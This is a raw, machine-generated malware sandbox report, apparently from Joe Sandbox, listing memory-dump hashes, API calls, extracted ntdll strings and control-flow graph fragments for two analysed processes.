                                  • Opcode Fuzzy Hash: 353cc7ad62ea0c2ba463f05c7eb13feb5395111f0485b7db2a506bf84649ec31
                                  • Instruction Fuzzy Hash: 5190022921340006D6807158540860A0005D7D3302F95D419A201D558CCA15CA7D5322
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ba865aff2cbf1c1e96e704a63ee0cf365e0d8ba70d220c426e779d3bcdd7610b
                                  • Instruction ID: bdfd0d62aa115f107324c3f33b90c26920ddef99f2d1954b5ea32ef0557edce6
                                  • Opcode Fuzzy Hash: ba865aff2cbf1c1e96e704a63ee0cf365e0d8ba70d220c426e779d3bcdd7610b
                                  • Instruction Fuzzy Hash: 5D90022130140007D640715854186064005E7E3301F55D015E241C554CDA15CA6E5323
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a980349aa3a13c00942c41d10a251c5c1be4dee3d71e5d83024fdb5f70e6a7e0
                                  • Instruction ID: bd7e9d8f084e3a048d3d7a220314d04c25b73a0c36fbd0482efad55b82e3a9a3
                                  • Opcode Fuzzy Hash: a980349aa3a13c00942c41d10a251c5c1be4dee3d71e5d83024fdb5f70e6a7e0
                                  • Instruction Fuzzy Hash: B390023120140406D600759854086460005D7E2301F55D015A702C555EC765CAA96232
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 83954c91d061b059335233521a42534a339361b6b9238953b7575010d49cf453
                                  • Instruction ID: c5b7c86fab0d4f88b0a3ebcd014f7e0063e73d18f6c48a21ffddedb7d39509fd
                                  • Opcode Fuzzy Hash: 83954c91d061b059335233521a42534a339361b6b9238953b7575010d49cf453
                                  • Instruction Fuzzy Hash: 4F90022160540406D640715854187060015D7D2301F55D015A202C554DC759CB6D67A2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a30f0f30bdf3e87ee6161599974f614bb026406216433cf6b2875dd1361d41fe
                                  • Instruction ID: 8030cf9d0186253ba8f66938e2d612c7fd292ea18a80e295e48f2a488efeb9b1
                                  • Opcode Fuzzy Hash: a30f0f30bdf3e87ee6161599974f614bb026406216433cf6b2875dd1361d41fe
                                  • Instruction Fuzzy Hash: E090023120140407D600715855087070005D7D2301F55D415A242C558DD756CA696222
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9eb77f188b90f35559c6add0e075cd2269de70970c93dcae0fceaf7e64c8430b
                                  • Instruction ID: 2b343ade601cb66ba02e7037b7820cf466809165dfe5dda0e330c50f65b861b7
                                  • Opcode Fuzzy Hash: 9eb77f188b90f35559c6add0e075cd2269de70970c93dcae0fceaf7e64c8430b
                                  • Instruction Fuzzy Hash: 1490023120140846D60071584404B460005D7E2301F55C01AA212C654DC715CA697622
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 217fd91b31c0ae4f167b683558add911b33930d365151372b22906fc210e86bf
                                  • Instruction ID: dce0a4a1283e08f1c002bdddc1f63f27f71a10219e33885438f8679d830fb0ca
                                  • Opcode Fuzzy Hash: 217fd91b31c0ae4f167b683558add911b33930d365151372b22906fc210e86bf
                                  • Instruction Fuzzy Hash: 6E90023120180406D6007158481470B0005D7D2302F55C015A316C555DC725CA696672
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1907aec8f329f703b97a03fff58166723e16f4b13055058f74ecb517e02f109a
                                  • Instruction ID: 21f98a9d9546e03e24835b7176840f75661157fae9026aebfdca1acc1e932245
                                  • Opcode Fuzzy Hash: 1907aec8f329f703b97a03fff58166723e16f4b13055058f74ecb517e02f109a
                                  • Instruction Fuzzy Hash: 8690023120180406D600715848087470005D7D2302F55C015A716C555EC765CAA96632
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dacf5e4242b6a46e395112dea53f4022459b5f98cc8e8cd2167be0a7db84d986
                                  • Instruction ID: b3e78a8ea0c623dd7e2052602772b269e6f384a59a76cf8333d5d362234fda07
                                  • Opcode Fuzzy Hash: dacf5e4242b6a46e395112dea53f4022459b5f98cc8e8cd2167be0a7db84d986
                                  • Instruction Fuzzy Hash: 44900221601400464640716888449064005FBE3311755C125A299C550DC659CA7D5766
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0895e26cccae673e6884646a5febefd8f821c5dac5a02cc19ae5249e429e44ac
                                  • Instruction ID: b871d35c272699c6530af8d3fd943df9ff756ca06bb07c423ea3194d005bf55a
                                  • Opcode Fuzzy Hash: 0895e26cccae673e6884646a5febefd8f821c5dac5a02cc19ae5249e429e44ac
                                  • Instruction Fuzzy Hash: 16900221211C0046D70075684C14B070005D7D2303F55C119A215C554CCA15CA795622
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d3119b091d6394799eab459d9a9c4b9ca38ba2f84239da03e23943622e17d59b
                                  • Instruction ID: b6d9cdc75c11681c0215dfc9a7ce43d82480ed0ce72ffc3fe78c4410d1ede8a1
                                  • Opcode Fuzzy Hash: d3119b091d6394799eab459d9a9c4b9ca38ba2f84239da03e23943622e17d59b
                                  • Instruction Fuzzy Hash: 4C90026134140446D60071584414B060005D7E3301F55C019E306C554DC719CE6A6227
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2b05d9bc1a3c420cf8386d603495b19f8addf20cd1472df4c8e630c25629ce0
                                  • Instruction ID: c6495ae448b46442f041409e3cee8d3545101849b6af17cfbafba6d28973e253
                                  • Opcode Fuzzy Hash: a2b05d9bc1a3c420cf8386d603495b19f8addf20cd1472df4c8e630c25629ce0
                                  • Instruction Fuzzy Hash: B490026121140046D604715844047060045D7E3301F55C016A315C554CC629CE795226
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26c7ccdb748964aab55483d96e261feab396c5f23ae015a210665a86ef7567c6
                                  • Instruction ID: 28ae1c1f2a46101f36063fbb77d1f38c979718ee21aa32ea952e11d3c9c6f1e7
                                  • Opcode Fuzzy Hash: 26c7ccdb748964aab55483d96e261feab396c5f23ae015a210665a86ef7567c6
                                  • Instruction Fuzzy Hash: 9690022160140506D60171584404616000AD7D2341F95C026A302C555ECB25CBAAA232
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3ccdef35ffecdb1fd3069509fd94853cdcb503f2aff7665f42c13c13ea5b20ed
                                  • Instruction ID: 77c07f78b990a51556965bbe4c46d45a39ed8231c2f901e069bcd819159bbfef
                                  • Opcode Fuzzy Hash: 3ccdef35ffecdb1fd3069509fd94853cdcb503f2aff7665f42c13c13ea5b20ed
                                  • Instruction Fuzzy Hash: 9F90027120140406D640715844047460005D7D2301F55C015A706C554EC759CFED6766
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e8704af9f8cc1ad4b330c09ae1941541ae365769687ab78dffe59fe460174dc
                                  • Instruction ID: de405e461e16dad9a34915b1a8024f21e368304756d11acfb0833ad6f23e0b3d
                                  • Opcode Fuzzy Hash: 6e8704af9f8cc1ad4b330c09ae1941541ae365769687ab78dffe59fe460174dc
                                  • Instruction Fuzzy Hash: 1590026120180407D640755848046070005D7D2302F55C015A306C555ECB29CE696236
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 858176113a9b0c3bdd121e82410b4b048d6731121a4cfc41537e466a904eaacd
                                  • Instruction ID: 9ccf296ddc0278d7caada25690a020f6b1daa9a5803455b6b48cdfb9aef45b91
                                  • Opcode Fuzzy Hash: 858176113a9b0c3bdd121e82410b4b048d6731121a4cfc41537e466a904eaacd
                                  • Instruction Fuzzy Hash: B451F6B6A0415ABFCB11EBAC889497EFBFDBB493407148229F5A9D3645D334DF4087A0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: eb23e5a3b7cd7a43d3cd86671f7dafacbfb0b918af37e666624f76f21872f1c0
                                  • Instruction ID: f53559e278aaf800f335d90daeffe80733bb4b67ebe2e7cf9a6321d8f2ea7b5f
                                  • Opcode Fuzzy Hash: eb23e5a3b7cd7a43d3cd86671f7dafacbfb0b918af37e666624f76f21872f1c0
                                  • Instruction Fuzzy Hash: 28510875A00645EECF70DF6CC89097FBBFDEB48305B048869F99AE7642D6B4DA008760
                                  Strings
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01914742
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019146FC
                                  • ExecuteOptions, xrefs: 019146A0
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01914787
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01914725
                                  • Execute=1, xrefs: 01914713
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01914655
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: d3d2e0c49e7e82629537dac92bd8ff3a42afc6ceb2a3c52de3005c9ac3b5999b
                                  • Instruction ID: 28675326be6aff16fbeeaa7f24bfe9b494c69dcf0aaa9d31c090642954e37454
                                  • Opcode Fuzzy Hash: d3d2e0c49e7e82629537dac92bd8ff3a42afc6ceb2a3c52de3005c9ac3b5999b
                                  • Instruction Fuzzy Hash: 7D51193160031E7AEF21EBA9EC89FA977B8EF19708F140499D609E7181EB709B41CF51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 68c04f06da47faa090e12cadc26a40164b3c6c2c0947ad279e6050bb31d960a0
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: DA81E070E452598FEF298E6CC8997FEBBF1AF47360F18411AD861E7691C7308A40CB51
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: 1963e33253a984a7be52202b47f6d78ee425856cf9412fa4f3d9e2c22593d9aa
                                  • Instruction ID: 4be54179ae59a794bf68f7a20ee260beb93f55383c11191f8a6e3a00cf2852b7
                                  • Opcode Fuzzy Hash: 1963e33253a984a7be52202b47f6d78ee425856cf9412fa4f3d9e2c22593d9aa
                                  • Instruction Fuzzy Hash: 5821217AA00119ABDB51DF7DDC44AAF7BEDAF54654F44012AEE49E3201E7309A018BA1
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019102BD
                                  • RTL: Re-Waiting, xrefs: 0191031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019102E7
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 60c7d93515814fbe59b2feaf11dc0dca938b738b0f8ed53c0f405004dfce4688
                                  • Instruction ID: c53510c3d020e59184744d0718d9afd85f8822975c99d2be14602828b6b3a54e
                                  • Opcode Fuzzy Hash: 60c7d93515814fbe59b2feaf11dc0dca938b738b0f8ed53c0f405004dfce4688
                                  • Instruction Fuzzy Hash: CDE1CE306047459FE725CF2CC884B2ABBE1BB85714F140A1DF6A9CB2D1D775DA85CB42
                                  Strings
                                  • RTL: Resource at %p, xrefs: 01917B8E
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01917B7F
                                  • RTL: Re-Waiting, xrefs: 01917BAC
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: f451712a75d600787856c8a791ec2f6f429ef70a42280eeabd5485304560f217
                                  • Instruction ID: 0d6fcce33fe10006ad21dfc200463afce24f1c675a6c55546ba4958ba839db45
                                  • Opcode Fuzzy Hash: f451712a75d600787856c8a791ec2f6f429ef70a42280eeabd5485304560f217
                                  • Instruction Fuzzy Hash: F741E3313007079FDB25DE29C840B6AB7E5EF9A711F110A2DF95AD7280DB31E645CB91
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0191728C
                                  Strings
                                  • RTL: Resource at %p, xrefs: 019172A3
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01917294
                                  • RTL: Re-Waiting, xrefs: 019172C1
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: bd7085361bc51ae2dcd7faa9b0bb15c41431e88e539b09bd4ed18eff24b2ac08
                                  • Instruction ID: 5ee761e6f802504b6e0eec760d586b5a9369edf832ee05e43891d573f2065749
                                  • Opcode Fuzzy Hash: bd7085361bc51ae2dcd7faa9b0bb15c41431e88e539b09bd4ed18eff24b2ac08
                                  • Instruction Fuzzy Hash: 4941023170030BABD725DE69CC81FA6B7A5FF96714F200A19F959EB240DB21E982C7D1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: ff668c705b5b7fe424d20d67e971779fbfb74d866c6ddb025239d99756abc07b
                                  • Instruction ID: e964f07a9b30c9d2d507142f5b49ab106895dfc1dcc7a3510f6a61d22d95352b
                                  • Opcode Fuzzy Hash: ff668c705b5b7fe424d20d67e971779fbfb74d866c6ddb025239d99756abc07b
                                  • Instruction Fuzzy Hash: 27317372A00219DFDB60DF2DDC40BAE77FCAB44A11F440599ED49E7201EB30AA488BA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 1a85958abcd0ad6a88490ebf8327277bb31706fcc1d87a48655afea2a7aeea4f
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: BB919071E0021A9BEB24DF6DC888ABEBBE5FF46720F14451AE955E72C4E7309B408791
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2230462145.0000000001870000.00000040.00001000.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_1870000_UnmxRI.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 780069e3bbc842ab045a057f0580cb86388502ea0c56d0b09de783311016cf43
                                  • Instruction ID: c7abfa3a1603851d0f85c2073ae9658a7a67e3eb8b0a3ed44850ce6f93b11cc0
                                  • Opcode Fuzzy Hash: 780069e3bbc842ab045a057f0580cb86388502ea0c56d0b09de783311016cf43
                                  • Instruction Fuzzy Hash: A8810C71D042699BDB36CB58CC44BEAB7B8AB48754F0045EAEA1DF7280D7709E84CF61

                                  Execution Graph

                                  Execution Coverage:9.4%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:93
                                  Total number of Limit Nodes:4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 1a[9$3X2$4'jq$TJoq$Tejq$pnq$xbmq
                                  • API String ID: 0-4226763738
                                  • Opcode ID: d47da74156e1c3da243a4d137278836b7d15d1880c9dbed75c67ac3bcfd61ccb
                                  • Instruction ID: 068b428dfb8e1d1b1433feb12d500ce221d9183bb426a9897ffa33c2f715595e
                                  • Opcode Fuzzy Hash: d47da74156e1c3da243a4d137278836b7d15d1880c9dbed75c67ac3bcfd61ccb
                                  • Instruction Fuzzy Hash: 28B2C174E00628CFDB65DF69C984AD9BBB2FF89304F1581E9D509AB225DB319E81CF40

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D05E
                                  • GetCurrentThread.KERNEL32 ref: 00B9D09B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D131
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0
                                  • Opcode ID: 848a71c94c6d159be1709d024cbd16704667b7519b56878ccf2f0238ac4ffc04
                                  • Instruction ID: e9022ed33374ee3746a0ef582113f75d19443698f82662174f11f1899a398201
                                  • Opcode Fuzzy Hash: 848a71c94c6d159be1709d024cbd16704667b7519b56878ccf2f0238ac4ffc04
                                  • Instruction Fuzzy Hash: 3D5149B49007498FDB14DFAAD548B9EBFF5EF88304F208459D409B7360D778A984CB65

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D05E
                                  • GetCurrentThread.KERNEL32 ref: 00B9D09B
                                  • GetCurrentProcess.KERNEL32 ref: 00B9D0D8
                                  • GetCurrentThreadId.KERNEL32 ref: 00B9D131
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Current$ProcessThread
                                  • String ID:
                                  • API String ID: 2063062207-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 531 6addf00-6ade01c 546 6addfcd-6addfd0 531->546 547 6addfe7-6addff2 546->547 548 6addfd2 546->548 555 6addf10-6addfb3 547->555 556 6addf50 547->556 560 6addfa2-6addfab 548->560 555->546 556->555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2172890632.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_6ad0000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tejq$Tejq
                                  • API String ID: 0-942063033

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 572 b9ad48-b9ad57 573 b9ad59-b9ad66 call b9a06c 572->573 574 b9ad83-b9ad87 572->574 579 b9ad68 573->579 580 b9ad7c 573->580 576 b9ad89-b9ad93 574->576 577 b9ad9b-b9addc 574->577 576->577 583 b9ade9-b9adf7 577->583 584 b9adde-b9ade6 577->584 627 b9ad6e call b9afd1 579->627 628 b9ad6e call b9afe0 579->628 580->574 585 b9adf9-b9adfe 583->585 586 b9ae1b-b9ae1d 583->586 584->583 589 b9ae09 585->589 590 b9ae00-b9ae07 call b9a078 585->590 588 b9ae20-b9ae27 586->588 587 b9ad74-b9ad76 587->580 591 b9aeb8-b9af78 587->591 593 b9ae29-b9ae31 588->593 594 b9ae34-b9ae3b 588->594 595 b9ae0b-b9ae19 589->595 590->595 622 b9af7a-b9af7d 591->622 623 b9af80-b9afab GetModuleHandleW 591->623 593->594 598 b9ae48-b9ae51 call b9a088 594->598 599 b9ae3d-b9ae45 594->599 595->588 603 b9ae5e-b9ae63 598->603 604 b9ae53-b9ae5b 598->604 599->598 605 b9ae81-b9ae85 603->605 606 b9ae65-b9ae6c 603->606 604->603 610 b9ae8b-b9ae8e 605->610 606->605 608 b9ae6e-b9ae7e call b9a098 call b9a0a8 606->608 608->605 613 b9aeb1-b9aeb7 610->613 614 b9ae90-b9aeae 610->614 614->613 622->623 624 b9afad-b9afb3 623->624 625 b9afb4-b9afc8 623->625 624->625 627->587 628->587
                                  APIs
                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 00B9AF9E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: HandleModule
                                  • String ID:
                                  • API String ID: 4139908857-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 629 b944b0-b959d9 CreateActCtxA 632 b959db-b959e1 629->632 633 b959e2-b95a3c 629->633 632->633 640 b95a4b-b95a4f 633->640 641 b95a3e-b95a41 633->641 642 b95a51-b95a5d 640->642 643 b95a60 640->643 641->640 642->643 645 b95a61 643->645 645->645
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00B959C9
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2168674243.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_b90000_tehuvFgZlLZK.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
